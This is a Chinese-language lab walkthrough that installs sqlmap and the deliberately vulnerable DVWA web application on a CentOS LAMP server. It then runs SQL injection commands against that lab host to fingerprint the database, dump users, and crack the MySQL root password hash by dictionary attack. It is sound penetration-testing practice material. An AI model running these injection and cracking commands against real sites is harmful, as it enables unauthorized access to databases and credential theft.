yum install python -y
python -V
tar zxvf sqlmapproject-sqlmap-1.2.11-13-gabb911d.tar.gz
cd sqlmapproject-sqlmap-abb911d/
sqlmapproject-sqlmap-7eab1bc]# ls
doc lib procs shell sqlmap.conf tamper txt waf extra plugins README.md sqlmapapi.py sqlmap.py thirdparty udf xml
3、運行sqlmap
[root@localhost sqlmapproject-sqlmap-abb911d]# ./sqlmap.py
4、創建一個sqlmap軟件鏈接
ln -s /root/sqlmapproject-sqlmap-abb911d/sqlmap.py /usr/bin/sqlmap
sqlmap -h #可以彈出幫助信息,說明安裝成功了
5.安裝網站程序
yum install -y httpd php php-mysql php-gd mariadb-server mariadb mysql
systemctl start httpd && systemctl enable httpd
systemctl start mariadb && systemctl enable mariadb
3、測試LAMP環境:
[root@xuegod63 ~]# vim /var/www/html/test.php
<?php
phpinfo();
?>
http://45.115.243.24/index.php
4、配置mysql數據root用戶密碼:
mysqladmin -u root password "123456"
mysql -u root -p123456
5、將下載的dvwa滲透系統代碼上傳到Linux上,並解壓到網站根目錄下
unzip -d /var/www/html/ DVWA-master.zip
ls /var/www/html/
DVWA-master test.php
chown apache:apache /var/www/html/DVWA-master/ -R
6、編輯DVWA配置文件/dvwa/config/config.inc.php,配置數據庫信息,user和password是MySQL的用戶名和密碼。
vi /var/www/html/DVWA-master/config/config.inc.php.dist
vi /var/www/html/DVWA-master/config/config.inc.php
修改的地方如下:
$_DVWA[ 'db_server' ] = '127.0.0.1';
$_DVWA[ 'db_database' ] = 'dvwa';
$_DVWA[ 'db_user' ] = 'root';
$_DVWA[ 'db_password' ] = '123456'; #只需要修改成你的mysql的root用戶密碼
cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php
http://45.115.243.24/DVWA-master/setup.php
報錯修改
vi /etc/php.ini
改:815 allow_url_include = Off
為: allow_url_include = On
(allow_url_include = On 會讓本機所有 PHP 程序都能 include 遠程 URL,這里只是為了 DVWA 的文件包含實驗而開啟,實驗主機應放在隔離的網絡中。)
systemctl restart httpd
[root@xuegod63 ~]# vi /var/www/html/DVWA-master/config/config.inc.php
改:
26 $_DVWA[ 'recaptcha_public_key' ] = '';
27 $_DVWA[ 'recaptcha_private_key' ] = '';
為:
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
http://45.115.243.24/DVWA-master/login.php
登錄用戶名和密碼:admin 和 password
注入
sqlmap -h
http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
o6fb5ftgc8baogcra5u8786571
low
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --current-db --current-user
Y #已經識別出來為mysql,現在直接跳過,不再掃描其他類型的數據庫
n #這里寫n 如果有想測試一些mysql其他值,就先Y,寫Y測試時間比較長。
GET parameter[y/N]N
web server operating system: Linux CentOS 7-1708
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '5.5.60-MariaDB'
[20:17:55] [INFO] fetching current user
current user: 'root@localhost'
[20:17:55] [INFO] fetching current database
current database: 'dvwa'
[20:17:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/45.115.243.24'
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -b --string="Surname" --users --password
每行彈出的含意:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]y
temporary [ˈtemprəri] 臨時的
eventual [ɪˈventʃuəl] 最終發生的
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y #是否對取回的密碼哈希值進行基於字典的攻擊?
[1] default dictionary file '/root/sqlmapproject-sqlmap-abb911d/txt/wordlist.zip' (press Enter) #回車
[20:29:58] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:30:01] [INFO] starting dictionary-based cracking (mysql_passwd)
[20:30:01] [INFO] starting 8 processes
[20:30:01] [INFO] cracked password '123456' for user 'root'
database management system users password hashes:
[*] root [2]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa --tables
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users --columns
sqlmap -u "http://45.115.243.24/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit" --cookie="security=low; PHPSESSID=o6fb5ftgc8baogcra5u8786571" -D dvwa -T users -C user,password --dump